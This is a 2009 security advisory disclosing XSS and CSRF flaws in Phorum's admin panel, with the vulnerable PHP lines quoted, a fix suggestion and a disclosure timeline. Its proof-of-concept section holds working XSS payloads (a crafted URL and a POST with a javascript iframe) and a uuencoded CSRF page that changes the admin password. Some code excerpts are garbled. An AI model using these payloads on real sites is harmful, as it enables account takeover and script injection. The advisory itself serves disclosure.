#=cicatriz =#=~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~(advisories)=# /) /) /) _ _ _______(/ ________ // _ (/_ _ _____ _ (/__(_)(_)(_(_(_)(_) (/_(_(_/_) /_)_ o (_)/ (_(_/_ .-/ #=Phorum < 5.2.10 Cross-Site Scripting/Request Forgery=#=~~~~~~~~~~~~~~~(_/~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~=# #=~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~=# #=Advisory & Vulnerability Information=#=~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~=# Title: Phorum < 5.2.10 Cross-Site Scripting/Request Forgery Advisory ID: VUDO-2009-1504 Advisory URL: http://research.voodoo-labs.org/advisories/4 Date founded: 10-4-2009 Vendors contacted: Phorum Class: Multiple Vulnerabilities Remotely Exploitable: Yes Localy Exploitable: No Exploit/PoC Available: Yes Policy: Full Disclosure Policy (RFPolicy) v2.0 #=~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~=# #=Tested & Vulnerable packages=#=~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~=# [+] Phorum 5.2.10 [+] Phorum 5.2-dev #=~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~=# #=Solutions and Workarounds=#=~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~=# Phorum released some important fixes for the Cross-Site Scripting vulnerabilities [1] #=~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~=# #=Technical Information=#=~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~=# Phorum [2] suffers from a series of Cross-Site Scripting (XSS) and Cross-Site Request Forgery (CSRF) vulnerabilities, trough the admin panel and the "file uploading" section (with an XML file but it only works if you are using Mozilla Firefox as browser and a crafted XUL file). Some other vulnerabilities: [*] Cross-Site Scripting (XSS): The most simple XSS can be executed easily and the error can be found on the file "include/admin/banlist.php": +++include/admin/banlist.php @@ 88:104 88 if($_GET["curr"] && $_GET["delete"]){ 89 90 ?> 91 92
93 Are you sure you want to delete this entry? 94
" method="post"> 95 XXX 96 97 98   99
100
101 102 80
XXX 81 New Phorum version available! 82
83 ---versioncheck.php There's another XSS on the file "include/admin/users.php" but it can only be exploited from a POST request on this lines: +++include/admin/users.php @@ 87:93 87 //check for a valid email 88 if (!empty($_POST["email"])) { 89 include('./include/email_functions.php'); 90 $valid_email = phorum_valid_email($_POST["email"]); 91 if ($valid_email !== true) XXX 92 $error = "The email \"$_POST[email]\" is not valid!"; 93 } ---include/admin/users.php Also the line 82, on the same file, its vulnerable to the same attack. In the users.php file there's another vulnerable line, trough the request Referer parameter or $_POST['referrer']. +++include/admin/users.php @@ 52:59 52 if (isset($_POST['referrer'])) { XXX 53 $referrer = $_POST['referrer']; 54 unset($_POST['referrer']); 55 } elseif (isset($_SERVER['HTTP_REFERER'])) { XXX 56 $referrer = $_SERVER['HTTP_REFERER']; 57 } else { 58 $rererrer = "{$PHORUM["admin_http_path"]}?module=users"; 59 } ---include/admin/users.php +++include/admin/users.php @@ 659:661 659 XXX 660 $frm->hidden("referrer", $referrer); 661 ---include/admin/users.php A way to fix this can be done using htmlspecialchars() or htmlentities() and any other function that does a sanity check, i.e: +++ --- [*] Cross-Site Request Forgery (CSRF): All the forms on the admin panel it's vulnerable to CSRF because of the lack of security tokens to check if the administrator really wants to do those actions. Without a token an attacker can create a new user as admin or change the administrator passwords and other personal data. Another type of action can be done with a simple bbcode [img] tag. When the administrator see the [img] tag with a special crafted URL, an action, such as delete a topic, could be executed. A more dangerous attack can lead to JavaScript execution. [3] Other vulnerabilities were founded on this application. (WHK) #=~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~=# #=Proof of Concept=#=~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~=# [*] Cross-Site Scripting (XSS): +++ http://localhost/phorum-5.2.10/admin.php?module=banlist&curr=1">", location="http://www.victim.com/phorum-5.2.10/versioncheck.php"; --- +++ POST /phorum-5.2.10/admin.php HTTP/1.1 module=users&referrer=http%3A%2F%2Fwww.victim.com%2Fphorum-5.2.10%2Fadmin.php%3Fmodule%3Dusers &addUser=1&username=xss&real_name=xss& email=%3Ciframe%2Fsrc%3D%22javascript%3Aalert%28%27voodoo%27%29%3B%22%3E&password1=xss&password2=xss &admin=0 --- [*] Cross-Site Request Forgery (CSRF): Other CSRF proof-of-concept exploits can be found on: [*] http://research.voodoo-labs.org/code/exploits/phorum/5.2.10/ If the administrator see this special crafted HTML page, his password will be changed to a string specified by the attacker. (uuencoded) +++ begin 644 attack.html M/&AT;6P^"CQB;V1Y/@H)/&@Q/E!H;W)U;2`U+C(N,3`@(F5D:71U7!E/2)H:61D96XB/@H)"3QI;G!U="!N86UE/2)R969E7!E/2)H:61D96XB/@H)"3QI;G!U="!N M86UE/2)P87-S=V]R9#(B('9A;'5E/2)P=VYE9"(@='EP93TB:&ED9&5N(CX* M"0D\=&5X=&%R96$@#MH96EG:'0Z,'!X.V)O'1A#MH M96EG:'0Z,'!X.V)O#MH96EG:'0Z,'!X.V)O#LB/CPO=&5X=&%R96$^/"]T9#X*"0D\6QE/2)W M:61T:#HP<'@[:&5I9VAT.C!P>#MB;W)D97(Z,'!X.R(@;F%M93TB<&%R96YT M7VED(B`^"@D)"3QO<'1I;VX@=F%L=64](C$B('-E;&5C=&5D/2)S96QE8W1E M9"(^+2U.;VYE+2T\+V]P=&EO;CX*"0D\+W-E;&5C=#X*"0D\6QE/2)W:61T:#HP<'@[:&5I9VAT.C!P>#MB;W)D97(Z,'!X.R(@;F%M93TB M86-T:79E(B`^"@D)"3QO<'1I;VX@=F%L=64](C`B/DYO/"]O<'1I;VX^"@D) M"3QO<'1I;VX@=F%L=64](C$B('-E;&5C=&5D/2)S96QE8W1E9"(^665S/"]O M<'1I;VX^"@D)/"]S96QE8W0^"@D)/'-E;&5C="!S='EL93TB=VED=&@Z,'!X M.VAE:6=H=#HP<'@[8F]R9&5R.C!P>#LB(&YA;64](G1E;7!L871E(B`^"@D) M"3QO<'1I;VX@=F%L=64](F5M97)A;&0B('-E;&5C=&5D/2)S96QE8W1E9"(^ M4&AO#MH96EG:'0Z,'!X.V)O M#4P,"D[/"]S8W)I<'0^ 2"CPO8F]D>3X*/"]H=&UL/@H* ` end --- #=~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~=# #=Reporting Timeline=#=~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~=# [*] 10-04-2009: Bugs discovered. [*] 10-04-2009: Voodoo contacted the vendor (advisory draft included). [*] 13-04-2009: The vendor released fixes for Cross-Site Scripting vulnerabilities. [*] 15-04-2009: Advisory VUDO-2009-1504 published. #=~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~=# #=References=#=~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~=# [1] http://trac.phorum.org/changeset/4009 [2] http://www.phorum.org/ [3] http://foro.elhacker.net/nivel_web/multiples_fallas_en_phorum_5210-t248300.0.html #=cicatriz =#=~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~(advisories)=# #=mié 15 abr 2009 ART=#=~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~=#